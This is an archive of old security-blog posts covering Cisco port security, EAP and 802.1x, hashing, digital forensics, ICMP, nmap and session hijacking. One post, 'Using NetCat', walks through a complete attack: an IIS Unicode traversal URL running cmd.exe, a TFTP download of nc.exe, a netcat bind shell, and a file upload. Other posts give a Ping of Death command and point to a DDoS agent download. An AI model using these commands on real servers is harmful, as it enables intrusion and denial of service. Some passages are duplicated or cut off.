HACK BLOG

SWITCHPORT PORT-SECURITY : Lock Down Security on Cisco Switches

2011-06-20T08:33:00.000-07:00

Hello everyone, its been ages since I have posted on this blog. Sorry!! Mainly because, my focus shifted from Security to Networking, because I realized I gotta master Networking first to be a Security Professional. So, I have cleared CCNA, CCNA Security, CCNP ROUTE in the meanwhile and I am currently studying for CCNP SWITCH right now.
I wish to share an awesome feature of Cisco Switches - SwitchPort Security.

NEED ::

Wireless Networking has changed the face of the Switch Security. Until now, we believed that the only way to break into the network was through the Internet. Because the Wireless Access Points defaults to no security and allow anyone to connect to the Enterprise Network, SwitchPort Security was essential to limit who can and who cannot connect to the Switch Ports and access the Network.

A growing challenge facing network administrators is determining how to control who can access the organization’s internal network — and who can’t. For example, can anyone walk into your office, plug in a laptop, and access your network? Moreover, in today's network, needless to say, you donot trust each of your employees. And if none of the above two scenarios is correct, it may be an infected PC that is generating a broadcast storm or generating frames from thousand different MAC addresses to populate Switch's CAM (Content Addressable Memory) table and turn the Switch into a miserable Hub.

Understand the basics

In its most basic form, the Port Security feature remembers the Ethernet MAC address connected to the switch port and allows only that MAC address to communicate on that port. If any other MAC address tries to communicate through the port, port security will take an action configured by you, which is either ignoring the packet from unknown MAC address or disabling the port. Most of the time, network administrators configure the switch to send a SNMP trap to their network monitoring solution that the port’s disabled for security reasons.

Of course, implementing any security solution always involves a trade-off — most often, you trade increased security for less convenience. When using port security, you can prevent devices from accessing the network, which increases security.

Configure port security

Configuring the Port Security feature is relatively easy. In its simplest form, port security requires going to an already enabled switch port and entering the port-security Interface Mode command. Here’s an example:

Switch)# config t
Switch(config)# int fa0/18
Switch(config-if)# switchport port-security ?
aging           Port-security aging commands
mac-address     Secure mac address
maximum         Max secure addresses
violation       Security violation mode

Switch(config-if)# switchport port-security
Switch(config-if)#^Z

By entering the most basic command to configure port security, we accepted the default settings of only allowing one MAC address, determining that MAC address from the first device that communicates on this switch port, and shutting down that switch port if another MAC address attempts to communicate via the port. But you don’t have to accept the defaults.

Know your options

As you can see in the example, there are a number of other port security commands that you can configure. Here are some of your options:

switchport port-security maximum {max # of MAC addresses allowed}: You can use this option to allow more than the default number of MAC addresses, which is one. For example, if you had a 12-port hub connected to this switch port, you would want to allow 12 MAC addresses — one for each device. The maximum number of secure MAC addresses per port is 132.

switchport port-security violation {shutdown | restrict | protect}: This command tells the switch what to do when the number of MAC addresses on the port has exceeded the maximum. The default is to shut down the port. However, you can also choose to alert the network administrator (i.e., restrict) or only allow traffic from the secure port and drop packets from other unknown MAC addresses (i.e., protect).

switchport port-security mac-address {MAC address}: You can use this option to manually define the MAC address allowed for this port rather than letting the port dynamically determine the MAC address.

Of course, you can also configure port security on a range of ports. Here’s an example:

Switch)# config t
Switch(config)# int range fastEthernet 0/1 - 24
Switch(config-if)# switchport port-security

However, you need to be very careful with this option if you enter this command on an uplink port that goes to more than one device. As soon as the second device sends a packet, the entire port will shut down.

View the status of port security

Once you’ve configured port security and the Ethernet device on that port has sent traffic, the switch will record the MAC address and secure the port using that address. To find out the status of port security on the switch, you can use the show port-security address and show port-security interface commands. Below are examples for each command’s output:

Switch# show port-security address
      Secure Mac Address Table
-------------------------------------------------------------------
Vlan    Mac Address       Type                Ports   Remaining Age
                                                     (mins)
----    -----------       ----                -----   -------------
1    0004.00d5.285d    SecureDynamic       Fa0/18       -
-------------------------------------------------------------------
Total Addresses in System (excluding one mac per port)     : 0
Max Addresses limit in System (excluding one mac per port) : 1024

Switch# show port-security interface fa0/18
Port Security                        : Enabled
Port Status                          : Secure-up
Violation Mode                       : Shutdown
Aging Time                           : 0 mins
Aging Type                           : Absolute
SecureStatic Address Aging           : Disabled
Maximum MAC Addresses                : 1
Total MAC Addresses                  : 1
Configured MAC Addresses             : 0
Sticky MAC Addresses                 : 0
Last Source Address                  : 0004.00d5.285d
Security Violation Count             : 0

Switch#

For more information on switch port commands and configuring the Port Security feature, check out Cisco’s Enabling Port Security documentation for the Catalyst 2950. What steps have you taken to lock down switch port security? Share your tips in this article’s discussion.

Extensible Authentication Protocol (EAP)

2010-07-06T14:53:00.000-07:00

Type of Network Access	Available EAP Methods
Dial-up remote access or site-to-site connections	EAP-MD5 CHAP, EAP-TLS
Virtual private network remote access connections	EAP-MD5 CHAP, EAP-TLS, PEAP-MS-CHAP v2, PEAP-TLS
Virtual private network site-to-site connections	EAP-MD5 CHAP, EAP-TLS
802.1X authentication to an authenticating switch (wired)	EAP-MD5 CHAP, PEAP-MS-CHAP v2, EAP-TLS, PEAP-TLS
802.1X authentication to a wireless AP	PEAP-MS-CHAP v2, EAP-TLS, PEAP-TLS

What is Extensible Authentication Protocol (EAP)?
The Extensible Authentication Protocol (EAP) is a general protocol for PPP and wireless authentication which supports multiple authentication mechanisms. Microsoft Windows uses EAP to authenticate Point-to-Point Protocol (PPP)-based connections (such as dial-up, virtual private network remote access, and site-to-site connections) and for IEEE 802.1X-based network access to authenticating Ethernet switches and wireless access points (APs).

EAP begins as the authenticator sends one or more Requests to authenticate the peer. The three devices involved in the 802.1x authentication are the client, an authentication server and Wireless Access Point (WAP). The user or client that wants to be authenticated is called a supplicant. The actual server doing the authentication, typically a RADIUS server, is called the authentication server. And the device in between, such as a wireless access point, is called the authenticator. The Request has a type field to indicate what is being requested. Examples of Request types include Identity, MD5-challenge, One-Time Passwords, Generic Token Card, etc. The peer sends a Response packet in reply to each Reques and the authenticator ends the authentication phase with a Success or Failure packet. This may look very simple but complexity resides in authenticating using the various methods such as EAP-PSK (Pre Shared Keys), EAP-MD5 (MD5 hashing), EAP-TLS(Transport Layer Security).

EAP Methods for Different Types of Network Access
The following table lists the different types of access and the available EAP methods you can use in Microsoft Windows. Microsoft Windows has its own proprietary MS-CHAPv2 authentication also method which provides secure authentication between devices.
Type of Network Access
Available EAP Methods
Dial-up remote access or site-to-site connections
EAP-MD5 CHAP, EAP-TLS
Virtual private network remote access connections
EAP-MD5 CHAP, EAP-TLS, PEAP-MS-CHAP v2, PEAP-TLS
Virtual private network site-to-site connections
EAP-MD5 CHAP, EAP-TLS
802.1X authentication to an authenticating switch (wired)
EAP-MD5 CHAP, PEAP-MS-CHAP v2, EAP-TLS, PEAP-TLS
802.1X authentication to a wireless AP
PEAP-MS-CHAP v2, EAP-TLS, PEAP-TLS

802.1x

2010-07-06T14:34:00.000-07:00

I was trying to dig deeper into the Wireless Security Standards - WEP & WPA, when I read about 802.1x and I was blown by its widespread use and the research work put behind the framing of the standard.

WEP had many security flaws such as static preshared keys, which could be easily cracked. So Cisco came out with its interim solution for Wi-Fi security in its devices which used dynamic key exchange, a new encrption key for each packet and authentication using IEEE 802.1x. Extensible Authentication Protocol (EAP) authentication is now used in WPA and WPA2 for 802.11.

IEEE 802.1x standard is simply a standard for passing EAP over a wired or wireless LAN. With 802.1x, you package EAP messages in Ethernet frames and don't use PPP. It's authentication and nothing more. That's desirable in situations in which the rest of PPP isn't needed, where you're using protocols other than TCP/IP, or where the overhead and complexity of using PPP is undesirable.

The three devices involved in the 802.1x authentication are the client, an authentication server and Wireless Access Point (WAP). The user or client that wants to be authenticated is called a supplicant. The actual server doing the authentication, typically a RADIUS server, is called the authentication server. And the device in between, such as a wireless access point, is called the authenticator. One of the key points of 802.1x is that the authenticator can be simple and dumb - all of the brains have to be in the supplicant and the authentication server. This makes 802.1x ideal for wireless access points, which are typically small and have little memory and processing power.

Message Digests (HASH)

2010-04-27T01:27:00.000-07:00

Message digests or hashes are commonly 128 bits to 160 bits in length and provide a digital identifier for each digital file or document. Message digest functions also called hash functions, are used to produce digital summaries of information called message digests. Message digest functions are mathematical functions that process information to "produce a different message digest for each unique document". Identical documents have the same message digest; but if even one of the bits for the document changes, the message digest changes.

Figure. Example of the Message Digest Process

Because message digests are much shorter than the data from which the digests are generated and the digests have a finite length, duplicate message digests called collisions can exist for different data sets. However, good message digest functions use one-way functions to ensure that it is mathematically and computationally infeasible to reverse the message digest process and discover the original data.

Message digests are commonly used in conjunction with public key technology to create digital signatures or "digital thumbprints" that are used for authentication, integrity, and nonrepudiation. Message digests also are commonly used with digital signing technology to provide data integrity for electronic files and documents.

SQL Injection

2009-11-21T12:57:00.000-08:00

SQL Injection

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered or user input is not strongly typed.

SQL Injection like this

Presentation of Digital Evidence

2009-08-31T21:03:00.000-07:00

Documenting the Investigation.

Documenting is not a final step, but is essentially done throughout the investigation at all stages of investigation and processing digital evidence. Documentation showing evidence in its original state is regularly used to demonstrate that it is authentic and unaltered.

Documentation includes.

Software used and Version Numbers.
Collection tools.
Methods used.
Explanation of why this analysis.

Court Presentation.

The Discovery process
Checklists, notes, comments, email, etc.
Chain of Custody
Business Attire.
Ask for questions to be repeated.
Give your attorney a chance to object.
Review your notes before court
Always use your notes to answer questions.

Analysis of Digital Evidence

2009-08-31T21:02:00.001-07:00

Examination

Start a script with time, name and date.
Examine the partition and directories on the hard drive.
Use the Hex editor to view suspect areas.
Search for terms related to case.
Retrieve deleted files.
Check unallocated and slack space.
If evidence is found specify the cylinder, head and sector.

Authenticate your recovered evidence.

Create an Electronic Hash of all electronic evidence.
MD5SUM, SHA or Tripwire.

Analyze the data without modifying it.

Make two backups of the original data.
Perform a bit by bit (bit stream) backup.
Create a hash of each backup prior to analysis.

Identification of Digital Evidence

2009-08-31T21:01:00.000-07:00

Identification of digital evidence requires digital investigators to recognizze the hardware (computers, floppy frives, hard disks, network cable, etc) that contain the digital information and then search for relevant information and the digital data that can establish that a crime has been committed or can provide a link between a crime and its prepetrator.

Some Forensic toolkits to work with

Access Data's Forensic Toolkit
The Coroner's Toolkit (TCT)
ForensiX
New Technologies Inc (NTI)
Guidance Software's EnCase application.

Preservation of Digital Evidence

2009-08-31T20:46:00.000-07:00

The forensic engineer should take steps to ensure the safety of all persons at the scene and to protect the integrity of all evidence, both traditional and electronic.

Follow jurisdictional policy for securing the crime scene.

Ensure that all persons are removed from the immediate area from which evidence is to be collected.

Don’t shutdown before collecting evidence.
-There is the possibility of loss of volatile evidence and the attacker may have trojaned the startup and shutdown scripts, Plug and Play may alter the system configuration and temporary file systems may be wiped out.

Don’t run any programs on the affected system.
-There is the possibility of inadvertently triggering something that could change or destroy evidence.
- Any programs used should be on read-only media and should be statically linked.

Protect perishable(volatile) data physically and electronically.
- Network Information : Communication between system and the network
- Active Processes : Programs and daemons currently active on the system
- Logged-on Users : Users/employees currently using system
- Open Files : Libraries in use; hidden files; Trojans (rootkit) loaded in system
- Hardware : pagers, caller ID boxes, electronic organizers, cell phones
- All related evidence should be taken out of RAM

Forensic Engineer must handle the Evidence with delicate care and accuracy.
– Maintain a Chain of custody: Evidence form and locker.
– Who, How and Why was it collected..
– Who took possession of it?
– How was it stored and protected.
– Who and why was it taken out of storage?
– ISP normally maintain logs for about 30 days.
– Assign an evidence custodian.
– Identify and label everything.
– Case number, description, signature, date and time.
- Document the time and date of the CMOS
– Photograph/video tape the crime scene.

A copy of the digital evidence from the hard drive(s) should be made. DISK IMAGING.
No possible evidence is damaged, destroyed, or otherwise compromised by the procedures used to search the computer

Prevent viruses from being introduced to a computer during the analysis process

Extracted / relevant evidence is properly handled and protected from later mechanical or electromagnetic damage

Aquitision of Digital Evidence

2009-08-31T20:37:00.000-07:00

– Acquiring the data : Acquire the evidence without altering or damaging the original.

• Opt 1- Perform the analysis on a live system?

» Utilities have most likely been modified by intruder.
» Least defensible in court.

• Opt 2 - Examine a forensic copy of the original data.

» Most defensible in court

• Opt 3 - Pull the plug.

» Damage is in progress.

Digital Evidence

2009-08-31T13:36:00.000-07:00

What is a Digital Evidence?

Any information being subject to human intervention or not, that can be extracted from a computer.
Must be in human-readable format or capable of being interpreted by a person with expertise in the subject.

Locard's Exchange Principle

Locard's Exchange Principle states "Anyone or Anything entering a crime scene TAKES 'something' of the scene with them or LEAVES 'something' of themselves behind when they depart."

This 'something' is known as Digital Evidence in cases of cyber crime and fraud.

If an investigator finds :

ONE of the above, then he can suspect somebody
BOTH of the above, then he can be sure

The use of digital evidence has increased in the past few decades as courts have allowed the use of e-mails, digital photographs, ATM transaction logs, word processing documents, instant message histories, files saved from accounting programs, spreadsheets, internet browser histories, databases, the contents of computer memory, computer backups, computer printouts, Global Positioning System tracks, logs from a hotel’s electronic door locks, and digital video or audio files.

Digital Evidence comes in numerous form factors, such as:

Download 108pages/2.96MB PDF presentation on Digital Evidence

Computer Forensics

2009-08-30T20:56:00.000-07:00

Computer Forensics is the use of certain tools and procedures to carry out investigation, analysis and study of computer devices for the gathering and preserving of evidence of a computer crime or fraud.

In Layman's terms : Computer Forensics is the art of looking at the information on a computer or digital device to determine what a person was doing in the electronic world.

Computer Forensics involves

of digital evidence in a manner that is legally acceptable in any judicial or administrative hearing.

HPing

2009-08-27T23:00:00.000-07:00

hping is a command-line oriented TCP/IP packet assembler/analyzer. hping sends ICMP echo requests & also supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Hping is one of the de facto tools for security auditing and testing of firewalls and networks. While hping was mainly used as a security tool in the past, it can be used in many ways by people that don't care about security to test networks and hosts. A subset of the stuff you can do using hping:

Firewall testing
Advanced port scanning
Network testing, using different protocols, TOS, fragmentation
Manual path MTU discovery
Advanced traceroute, under all the supported protocols
Remote OS fingerprinting
Remote uptime guessing
TCP/IP stacks auditing

Hping works on the following unix-like systems: Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X, Windows.

Download HPing at Download Mall

FIG . HPING2 . Click to enlarge

Ping Utility

2009-08-27T00:57:00.000-07:00

Ping Utility sends ICMP echo requests to the address you specify and lists the responses received and their round trip time. Alternatively, TCP/UDP packets are sent if incoming ICMP messages are blocked. When the utility is terminated it summarizes the results, giving the average round trip time and the percent packet loss. This utility can be used to determine whether there is a problem with the network connection between two hosts.

TOOLS : Pinger, WS_Ping ProPack, NetScan Tools, HPing, icmpenum

Ping

2009-08-27T00:38:00.000-07:00

Ping is a basic Internet program that allows a user to verify that a particular IP address exists and can accept requests.

Ping is used diagnostically to ensure that a host computer the user is trying to reach is actually operating. Ping works by sending an Internet Control Message Protocol (ICMP) Echo Request to a specified interface on the network and waiting for a reply. Ping can be used for troubleshooting to test connectivity and determine response time.

To find out the IP address for a given domain name e.g. en.wikipedia.org, Windows users can go to their command prompt screen (start/run/cmd) or use an external ping utility and enter

ping en.wikipedia.org

The following result was obtained from pinging en.wikipedia.org from Windows cmd.

Pinging rr.pmtpa.wikimedia.org [208.80.152.2] with 32 bytes of data:
Reply from 208.80.152.2: bytes=32 time=80ms TTL=53
Reply from 208.80.152.2: bytes=32 time=81ms TTL=53
Reply from 208.80.152.2: bytes=32 time=84ms TTL=53
Reply from 208.80.152.2: bytes=32 time=84ms TTL=53

Ping statistics for 208.80.152.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 80ms, Maximum = 84ms, Average = 82ms

Fig. PING DENY A server denying a ping request because of the request's size.

LAND Attack

2009-08-26T04:56:00.000-07:00

"A LAND attack involves IP packets where the source and destination address are set to address the same device."

In a LAND attack, the attacker sends infinite packets to the victim system from the victim system itself i.e spoofing the TCP SYN packet with the target host's IP address and using an open port as both source and destination.

The attack involves sending a spoofed TCP SYN packet with the target host's IP address and an open port as both source and destination. The same source and target address and port number crashes the victim system. The reason a LAND attack works is because it causes the machine to reply to itself continuously.

Other land attacks have since been found in services like SNMP and Windows 88/tcp (kerberos/global services) which were caused by design flaws where the devices accepted requests on the wire appearing to be from themselves and causing replies repeatedly.

PING OF DEATH

2009-08-26T04:34:00.000-07:00

The maximum packet size allowed to be transmitted by TCP/IP on a network is 65536(2^16-1) bytes.

In the Ping of Death (POD) Attack, a packet having a size greater than this maximum size allowed by TCP/IP, is sent to the target system. As soon as the target system receives a packet exceeding the allowable size, then it crashes, reboots or hangs.

This attack can easily be executed by the ‘ping’ command as follows:

ping -l 65540 hostname

This exploit has affected a wide variety of systems, including Unix, Linux, Mac, Windows, printers, and routers. However, most systems since 1997-1998 have been fixed, so this bug is mostly historical. The only solution is to secure the kernel against overflow when reconstructing IP fragments.

If your system is still vulnerableb to this attack, it will crash upon running this command:

ping -l 65510 your.host.ip.address

Using NetCat

2009-08-13T03:58:00.001-07:00

In this post, I'll demonstrate a tutorial complete hack, using free : NetCat only, just to point out how versatile it is.

type "nc /?" (without quotes) to explore various options/switches related to NetCat.

Port scanning with Netcat

A scanning example from Hobbit is "nc -v -w 2 -z target 20-30". Netcat will try connecting to every port from 20 to 30 at the target.
-z prevents sending any data to a TCP connection and very limited probe data to a UDP connection, and is thus useful as a fast scanning mode just to see what ports the target is listening on.

We scanned 192.168.1.1, ports 1-200. We can see that among others, port 80, 21 and 25 are open.

Banner Grabbing with Netcat
We're now interested in knowing what's running behind port 80 and 21. We can use Netcat to grab port banners in the following way:

Let's try to send a malformed URL which attempts to exploit the Unicode File Traversal vulnerability in unpatched IIS servers (Pre SP3). Basically this exploit allows us to "break out" of C:\inetpub\wwwroot and explore and execute programs anywhere on the attacked machine.

Voila! We've sent the URL:
http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:%5C to the vulnerable IIS server and what we see is a directory listing of the IIS server C drive. Great! Now we want to upload Netcat to the IIS server, so we'll use TFTP and integrate the TFTP commands into the malformed URL

tftp –I 192.168.1.9 GET nc.exe
Is transformed to:
http://<Exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe
Also take a note of your TFTP server, to see if it has successfully uploaded the nc.exe file:

Netcat as a BackDoor
In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS server (lets choose port 10001) and then we can connect to this port from our attacking machine…using Netcat of course!

The command we want to give on the server looks like this:
nc -L -p 10001 -d -e cmd.exe

Here's what that command does:
nc - tells Windows to run the nc.exe file with the following arguments:
-L Tells netcat to not close and wait for connections
-p Specifies a port to listen for a connection on
-d Tells Netcat to detach from the process we want it to run.
-e Tells what program to run once the port is connected to (cmd.exe)

If we now want to convert this command for Unicode URL use, it will look like this:
http://<Exploit URL>/c+nc+-L+-p+10001+-d+-e+cmd.exe
Now we will execute Netcat on the remote IIS machine:

This should have started Netcat listening on port 10001 on the IIS machine and should connect the cmd.exe process to the connection stream. From our machine we will try to connect to the Netcat on the IIS server.

Tada! We have now "Shoveled a Shell" using Netcat. We effectively have a remote command prompt of the IIS server, as can be seen from the IPConfig.

Transferring files using Netcat
We can use Netcat to transfer files from one system to another. To receive a file named hack.txt on the destination system start Netcat on the IIS server with the following command:
nc –l –p 1234 >hack.txt

On our source system (the attacking computer) we send a file named hack.txt to the IIS machine with the following command:
nc destination 1234 <hack.txt

Issue a ^C on the source system and your done. Be sure to check the file to be sure it is the same size as the original. This is what hack.txt looks like

and voila

We can see that the file hack.txt has been transferred to the target system, via port 1234.

ICMP Scanning - OS Detection

2009-08-13T03:15:00.000-07:00

There are numerous possible ICMP query messages that one can generate and send across a network. The list is available at: http://www.isi.edu/in-notes/iana/assignments/icmp-parameters.
When a host receives a particular type of ICMP query message, then according to its operating system, the host will generate a predefined respond.
This response varies from OS to OS and the contents of the response generated due to the ICMP messages varies from one OS to another and is same for one type of OS.
In other words, the response of a host to a particular type of ICMP message is hugely dependent on the OS running on it.
The same ICMP message sent to a UNIX system and a Windows system, will generate two different responses. This difference in responses, exists due to different Operating Systems.
By sending ICMP messages to a host and comparing the responses invoked against the known responses, one can deduce the OS running on the host.

ICMP Error Message Quenching -- Some (smart) operating systems limit the rate at which various error messages are sent. For example, the Linux kernel (in net/ipv4/icmp.h) limits destination unreachable message generation to 80 per 4 seconds, with a 1/4 second penalty if that is exceeded. One way to test this is to send a bunch of packets to some random high UDP port and count the number of unreachables received. This test would make the OS detection take a bit longer since you need to send a bunch of packets and wait for them to return, so it is hardly used in any scanner. Also dealing with the possibility of packets dropped on the network would be a pain.

ICMP Message Quoting -- The RFCs specify that ICMP error messages quote some small amount of an ICMP message that causes various errors. For a port unreachable message, almost all implementations send only the required IP header + 8 bytes back. However, Solaris sends back a bit more and Linux sends back even more than that. The beauty with this is it allows NMap to recognize Linux and Solaris hosts even if they don't have any ports listening.

ICMP Error message echoing integrity -- Machines have to send back part of your original message along with a port unreachable error. Yet some machines tend to use your headers as 'scratch space' during initial processing and so they are a bit warped by the time you get them back. For example, AIX and BSDI send back an IP 'total length' field that is 20 bytes too high. Some BSDI, FreeBSD, OpenBSD, ULTRIX, and VAXen fuck up the IP ID that you sent them. While the checksum is going to change due to the changed TTL anyway, there are some machines (AIX, FreeBSD, etc.) which send back an inconsistent or 0 checksum. Same thing goes with the UDP checksum. All in all, nmap does nine different tests on the ICMP errors to sniff out subtle differences like these.need to send a bunch of packets and wait for them to return. Also dealing with the possibility of packets dropped on the network would be a pain.

Internet Control Message Protocol (ICMP)

2009-08-12T03:38:00.000-07:00

Fig. ICMP Header. Click to enlarge

The Internet Control Message Protocol goals and features were outlined in RFC 792 as a way to provide a means to send error messages for non-transient error conditions, and to provide a way to probe the network in order to determine general characteristics about the network.

A more accurate definition of the Internet Control Message Protocol goals and features might be that it is used for two types of operations:

When a router or a destination host need to inform the source host about errors in a datagram processing, and
For probing the network with request & reply messages in order to determine general characteristics about the network.

The ICMP protocol has two types of operations; therefore its messages are also divided to two:

ICMP Error Messages
ICMP Query Messages

The Internet Assigned Numbers Authority (IANA) has a list defining the ICMP message types that are currently registered. It also lists the RFC that defines the ICMP message. The list is available at: http://www.isi.edu/in-notes/iana/assignments/icmp-parameters.

NMap

2009-08-11T05:54:00.001-07:00

Nmap features include:

Host Discovery - Identifying computers on a network, for example listing the computers which respond to pings, or which have a particular port open
Port Scanning - Enumerating the open ports on one or more target computers
Version Detection - Interrogating listening network services listening on remote computers to determine the application name and version number
OS Detection - Remotely determining the operating system and some hardware characteristics of network devices.

DOWNLOAD SITE : http://nmap.org/download.html , insecure.org

Sequence Numbers

2009-08-11T05:30:00.001-07:00

TCP provides a full duplex reliable stream connection between two end computers.

Data is packeted into a number of data packets and every byte that is sent by a host is marked with a sequence number and is acknowledged by the receiver using this sequence number.

Sequence numbers are a 32-bit counter, which means the value can be any of over 4 billion possible combinations.

Sequence numbers ensure that the receiving machine re-assembles the data packets in the same order to obtain the original data as they were dis-assembled at the transmitting end.

The sequence number for the first byte sent is computed during the connection opening.

If a computer opens a new connection in addition to an existing connection, the initial sequence number for two different sessions are different.

When the TCP sequence is predictable, an attacker can send packets that are forged to appear to come from a trusted computer using the sequence number used by the victim computer.

Pseudo-random number generators (PRNGs) introduced some randomness when producing ISNs used in TCP connections, thereby, making ISNs harder to guess, but were still vulnerable to statistical attack

Threat

If a sequence number within the receive window is known, an attacker can inject data into the session stream or choose to terminate the connection. If the attacker knows the initial sequence number, he can send a simple packet to inject data or kill the session if he is aware of the number of bytes transmitted in the session this far.

Fig. INITIAL SEQUENCE NUMBER. Click to magnify.

Initial Sequence Number (ISN) Sampling

2009-08-11T04:26:00.001-07:00

Learn about TCP/IP sequence numbers before reading this post.

TCP Initial Sequence Number (ISN) Sampling

Different OS choose different ISN while initiating a connection request to send a data packet.
Attackers find patterns in the initial sequence numbers chosen by TCP implementations when responding to a connection request.
Many old UNIX boxes use the traditional 64K ISN, while newer versions of Solaris, IRIX, FreeBSD, Digital UNIX, Cray, and many others use Random increments, Linux 2.0, OpenVMS, use truely "random" ISNs.
Windows boxes (and a few others) use a "time dependent" model where the ISN is incremented by a small fixed amount each time period.
NMap provides the capability to use this technique for OS identification.

NetCat

2009-08-10T12:18:00.000-07:00

Netcat is a utility that is able to write and read data across TCP and UDP network connections. Netcat can be used as port scanner, a backdoor, a port redirector, a port listener and lots of other cool things too. It's not always the best tool for the job, but if I was stranded on an island, I'd take Netcat with me ☺

Download Netcat from DOWNLOAD MALL

Some of netcat's major features are:

Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking, with appropriate warnings
Ability to use any local source port
Ability to use any locally-configured network source address
Built-in port-scanning capabilities, with randomization
Built-in loose source-routing capability
Can read command line arguments from standard input
Slow-send mode, one line every N seconds
Hex dump of transmitted and received data
Optional ability to let another program service established connections
Optional telnet-options responder

Related Posts : Using NetCat - for a complete Website Hack!!

Fig. NETCAT being used to port scanning

Banner Grabbing

2009-08-10T11:28:00.000-07:00

All open ports have a service or a daemon running on them. As soon as you telnet or connect to such open ports, you are greeted by a welcome message, which is actually known as the daemon banner. A daemon banner contains certain information about the daemon running on that particular port, other system information and sometimes also the message of the day.

If an attacker connects to various ports of the target system, then he will find that each port has a daemon banner waiting, which can reveal juicy pieces of information regarding the target host, including the operating system name, daemon name and version, time and date, etc.

Banner Grabbing is an enumeration technique used to glean information about computer systems on a network and the services running its open ports.

An intruder can use banner grabbing in order to find network hosts that are running versions of applications and operating systems with known exploits.

Tools commonly used to perform banner grabbing are Telnet, which is included with most operating systems, and Netcat.

For example one could establish a connection to a target host running a web service with netcat, then send a bad html request in order to get information about the service on the host:

  [root@prober] nc www.targethost.com 80
HEAD / HTTP/1.1

HTTP/1.1 200 OK
Date: Mon, 11 May 2009 22:10:40 EST
Server: Apache/2.0.46 (Unix) (Red Hat/Linux)
Last-Modified: Thu, 16 Apr 2009 11:20:14 PST
ETag: "1986-69b-123a4bc6"
Accept-Ranges: bytes
Content-Length: 1110
Connection: close
Content-Type: text/html

The administrator can now catalog this system or an intruder now knows what version of Apache to look for exploits for.

Stacheldraht

2009-08-08T00:09:00.000-07:00

Stacheldraht (German for barbed wire) is a piece of software written by Random for Linux and Solaris systems which acts as a distributed denial of service (DDoS) agent. The tool detects and automatically enables source address forgery.

Stacheldraht uses a number of different DoS attacks, including: UDP flood, ICMP flood, TCP SYN flood and Smurf attack.

It combines features of Trinoo with TFN, and adds encryption.

Stable release	4
Written in	C
Operating system	Linux, Solaris
Size	36 kb

DOWNLOAD Stacheldraht v4 at Download Mall

Man in the Middle Attack

2009-08-07T20:05:00.001-07:00

The man-in-the-middle attack (MITM) is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection when in fact the entire conversation is controlled by the attacker.

TOOLS USED:

dsniff - A tool for SSH and SSL MITM attacks
Cain - A Windows GUI tool which can perform MITM attacks, along with sniffing and ARP Poisoning
Ettercap - A tool for LAN based MITM attacks
Karma - A tool that uses 802.11 Evil Twin attacks to perform MITM attacks
AirJack - A tool that demonstrates 802.11 based MITM attacks
wsniff - A tool for 802.11 HTTP/HTTPS based MITM attacks

IPv4 - Security ??

2009-08-07T08:48:00.001-07:00

This post merely tries to explain the security issues and attacks involved in the use of IPv4 standard wrt SESSION HIJACKING

The original IPv4 standard needed to address three basic security issues - authentication, integrity and privacy.
Authentication was an issue because an attacker could easily spoof an IP address and exploit a session.
Spoofing was not restricted to IP address alone, but also extended to MAC addresses in ARP spoofing.
An attacker sniffing on a network could sniff packets and carry out simple attacks such as change, delete, reroute, add, forge or divert data. Perhaps the most popular among these attacks is the Man-In-the-Middle attack.
An attacker can grab unencrypted traffic from a victim's network-based TCP application, further tampering with the authenticity and integrity of the data before forwarding it on to the unsuspecting target.

Session Hijacking - How it Works?

2009-08-07T08:29:00.001-07:00

Read the original post on SESSION HIJACKING

To understand and fullly appreciate this post, please read

Steps in Session Hijacking - How it Works?

Tracking the connection

The attacker uses a network sniffer to track the victim and host or identify a suitable user by scanning with a scanning tool such as NMap to find a target with a trivial TCP sequence numbers prediction. This is done to ensure that because the correct sequence and acknowledgement numbers are captured. These will later be used by the attacker in crafting his own packets.

Desynchronizing the connection

The connection can be desynchronized in many ways as described :

To desynchronize the connection between the target and host, the sequence number or the acknowledgement number (SEQ/ACK) of the server must be changed. This can be done if null data is sent to the server so that the server's SEQ/ACK numbers will advance; while the target machine will not register such an increment.

The attacker sends a reset flag to the server and breaks the connection on the server side and create a new one with different sequence numbers. The attacker listens for a SYN/ACK packet from the server to the host. On detecting the packet, he sends an RST to the server and a SYN packet with a different sequence number. The server on receiving the RST packet, closes connection with the target, but initiates another one based on the SYN packet - with a different sequence number on the same port. Having opened a new connection, the server sends a SYN/ACK packet to the target for acknowledgement. The attacker detects (but does not intercept) this and sends back an ACK packet to the server. Now, the server is in the established state. The target is oblivious to the conversation and has already switched to the established state when it received the first SYN/ACK packet from the server. Now both server and target are in desynchronized but established state.

This can also be done using a FIN flag, but this will cause the server to respond with an ACK and give away the attack through an ACK storm. This results due to a flaw in this method of hijacking a TCP connection. When receiving an unacceptable packet the host acknowledges it by sending the expected sequence number and using its own sequence number. This packet is itself unacceptable and will generate an acknowledgement packet which in turn will generate an acknowledgement packet, thereby creating a supposedly endless loop for every data packet sent. The mismatch in SEQ/ACK numbers results in excess network traffic with both the server and target trying to verify the right sequence. Since these packets do not carry data they are not retransmitted if the packet is lost. However, since TCP uses IP the loss of a single packet puts an end to the unwanted conversation between the server and target on the network.

The desynchronizing stage is added in the hijack sequence so that the target host is kept in the dark about the attack. Without desynchronizing, the attacker will still be able to inject data to the server and even keep his identity by spoofing an IP address. However, he will have to put up with the server's response being relayed to the target host as well.

Injecting the attacker's packet

Now that the attacker has interrupted the connection between the server and target, he can choose to either inject data into the network or actively participate as the "man in the middle", and pass data from the target to the server, and vice versa, reading and injecting data as he sees fit.

TCP/IP - Layered Architecture

2009-08-07T08:25:00.001-07:00

The Transmission Control Protocol/Internet Protocol (TCP/IP) model describes a set of general design guidelines and implementations of specific networking protocols to enable computers to communicate over a network. Layers in the TCP/IP model :

* 1 Network Interface (Physical) Layer : The layer is used to move packets between the Internet Layer interfaces of two different hosts over a physical medium such as a fiber cable or a wire.
* 2 Internet Layer : Internet Protocol performs two basic functions:

